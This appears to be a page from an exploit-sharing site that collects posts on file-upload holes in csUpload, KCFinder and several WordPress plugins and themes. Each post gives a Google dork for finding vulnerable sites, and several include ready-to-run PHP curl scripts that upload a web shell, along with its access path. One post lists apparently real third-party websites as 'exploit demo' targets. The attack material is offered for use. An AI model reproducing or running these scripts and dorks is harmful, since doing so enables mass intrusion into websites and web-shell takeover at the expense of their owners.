upload vulnerability

csUpload Script Site Authentication Bypass

By |April 15th, 2014|

Exploit Title: csUpload Script Site Authentication Bypass
Google Dork: CSUpload.cgi?command=
Date: 4/9/2014
Exploit Author: Satanic2000
Vendor Homepage: http://www.cgiscript.net
Software Link: http://www.cgiscript.net/cgi-script/csNews/csNews.cgi?database=cgi.db&command=viewone&id=12
Tested on: linux
vuln: Site.com/[path]/CSUpload/CSUpload.cgi
[path] : /cgi-script/ or /cgi-bin/ or None
Example:
1- http://localhost/cgi-bin/CSUpload//CSUpload.cgi?command=login

2- Bypass Authentication http://localhost/cgi-bin/CSUpload/CSUpload.cgi

3- Select Database Select Databases And Upload (File,Or Shell)
Special tnx S3Ri0uS . Pejvak . l3l4ck.$c0rpi0n And Other Friend

Comments Off on csUpload Script Site Authentication Bypass

KCFinder 2.53 Shell Upload vulnerability

By |April 2nd, 2014|

Exploit Title : KCFinder Upload Shell Vulnerability
Date : 24/04/2014
Google Dork : inurl:/kcfinder/browse.php
Exploit Author : Iranian_Dark_Coders_Team
Home : http://www.idc-team.net
Discovered By : Black.Hack3r
Vendor Homepage : http://kcfinder.sunhater.com/
Version : 2.51 – 2.53
Tested on : Windows 8 & Linux

Events location bug:
http://[localhost]/[path]/kcfinder/config.php
Line 51: ‘deniedExts’ => “exe com msi bat php phps phtml php3 php4 cgi pl”,

Exploit:
http://[localhost]/kcfinder/browse.php
http://[localhost]/[path]/kcfinder/browse.php
Proof:

STEP 1: Go to target link
http://localhost/KCFinder/browse.php

STEP […]

Comments Off on KCFinder 2.53 Shell Upload vulnerability
  • wordpress exploits, webapps exploits, wordpress vulnerability, 1337mir
    Permalink wordpress exploits, webapps exploits, wordpress vulnerability, 1337mirGallery

    WordPress Blogfolio Theme Arbitrary File Upload Vulnerability

WordPress Blogfolio Theme Arbitrary File Upload Vulnerability

By |January 3rd, 2014|

Title : WordPress Blogfolio Theme Arbitrary File Upload Vulnerability
Author : eX-Sh1Ne
Date : 23/11/2013
Category : Web Applications
Type : PHP
Vendor : http://themify.me/
Download : http://themify.me/themes/blogfolio
Tested : Mozila, Chrome-> Windows
Vulnerabillity : Arbitrary File Upload
Dork : inurl:wp-content/themes/blogfolio/

Exploit:
< ? p h p $uploadfile=”sh1ne.php”; $ch = curl_init(“http://127.0.0.1/wp-content/themes/blogfolio/themify/themify-ajax.php?upload=1″); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array(‘Filedata’=>”@$uploadfile”));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
?>
Shell Access
http://127.0.0.1/[PATH]/wp-content/themes/blogfolio/uploads/sh1ne.php
or
http://127.0.0.1/[PATH]/wp-content/uploads/[years]/[month]/ > […]

Comments Off on WordPress Blogfolio Theme Arbitrary File Upload Vulnerability
  • wordpress exploits, webapps exploits, wordpress vulnerability, 1337mir
    Permalink wordpress exploits, webapps exploits, wordpress vulnerability, 1337mirGallery

    WordPress dzs-videogallery Plugins Remote File Upload Vulnerability

WordPress dzs-videogallery Plugins Remote File Upload Vulnerability

By |January 3rd, 2014|

Exploit Title: WordPress dzs-videogallery Plugins Remote File Upload Vulnerability
Author: iskorpitx
Date: 22/11/2013
Vendor Homepage: http://digitalzoomstudio.net
Themes Link: http://digitalzoomstudio.net/docs/wpvideogallery/
Infected File: upload.php
Category: webapps
Google dork: inurl:/wp-content/plugins/dzs-videogallery/
Tested on : Windows/Linux
< ? p h p $uploadfile=””; $ch = curl_init(“http://127.0.0.1/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.php”); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array(‘file_field’=>”@$uploadfile”));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch); curl_close($ch);
print “$postResult”;
?>
uploaded file:
http://127.0.0.1/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload/upload.html

Comments Off on WordPress dzs-videogallery Plugins Remote File Upload Vulnerability
  • WordPress-Complete-Gallery-Manager-3.3.3-File-Upload-Vulnerability
    Permalink WordPress-Complete-Gallery-Manager-3.3.3-File-Upload-VulnerabilityGallery

    WP page-flip-image-gallery plugins Remote File Upload Vulnerability

WP page-flip-image-gallery plugins Remote File Upload Vulnerability

By |January 3rd, 2014|

Exploit Title: WordPress page-flip-image-gallery plugins Remote FileĀ Upload Vulnerability
Author: Ashiyane Digital Security Team
Date: 12/06/2013
Vendor Homepage: http://pageflipgallery.com
Software Link : http://downloads.wordpress.org/plugin/page-flip-image-gallery.zip
Google dork: inurl:/wp-content/plugins/page-flip-image-gallery/
Tested on: Windows/Linux

1)Exploit :
< ? p h p $ uploadfile=”file.php”; $ ch = curl_init(” http://127.0.0.1/wp-content/plugins/page-flip-image-gallery/upload.php”); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array(‘orange_themes’=>”@$uploadfile”)); curl_setopt($ch,
CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch); print “$postResult”;
?>
2) Exploit demo :
http://arcticpackXging.com/wp-content/plugins/page-flip-image-gallery/upload.php
http://www.panvXlkargroup.org/wp-content/plugins/page-flip-image-gallery/upload.php
http://www.jamXma.it/wp-content/plugins/page-flip-image-gallery/upload.php
http://www.icipiXi.ie/suiomh/wp-content/plugins/page-flip-image-gallery/upload.php
uploaded file:
http://[Target]/wp-content/uploads/file.php

Comments Off on WP page-flip-image-gallery plugins Remote File Upload Vulnerability
  • WordPress-Complete-Gallery-Manager-3.3.3-File-Upload-Vulnerability
    Permalink WordPress-Complete-Gallery-Manager-3.3.3-File-Upload-VulnerabilityGallery

    WordPress Complete Gallery Manager 3.3.3 File Upload Vulnerability

WordPress Complete Gallery Manager 3.3.3 File Upload Vulnerability

By |October 8th, 2013|

Title: WordPress Plugin Complete Gallery Manager 3.3.3 – Arbitrary File Upload Vulnerability
Date: 013-09-17
References: http://www.vulnerability-lab.com/get_content.php?id=1080
VL-ID: 1080
Common Vulnerability Scoring System: 6.6
Vendor Homepage: http://codecanyon.net/item/complete-gallery-manager-for-wordpress/2418606

Introduction:
Using Complete Gallery Manager will make it fun and fast to manage and create galleries for your website.
The plugin enables a wealth of functionality, but just because you can take advantage of its many […]

Comments Off on WordPress Complete Gallery Manager 3.3.3 File Upload Vulnerability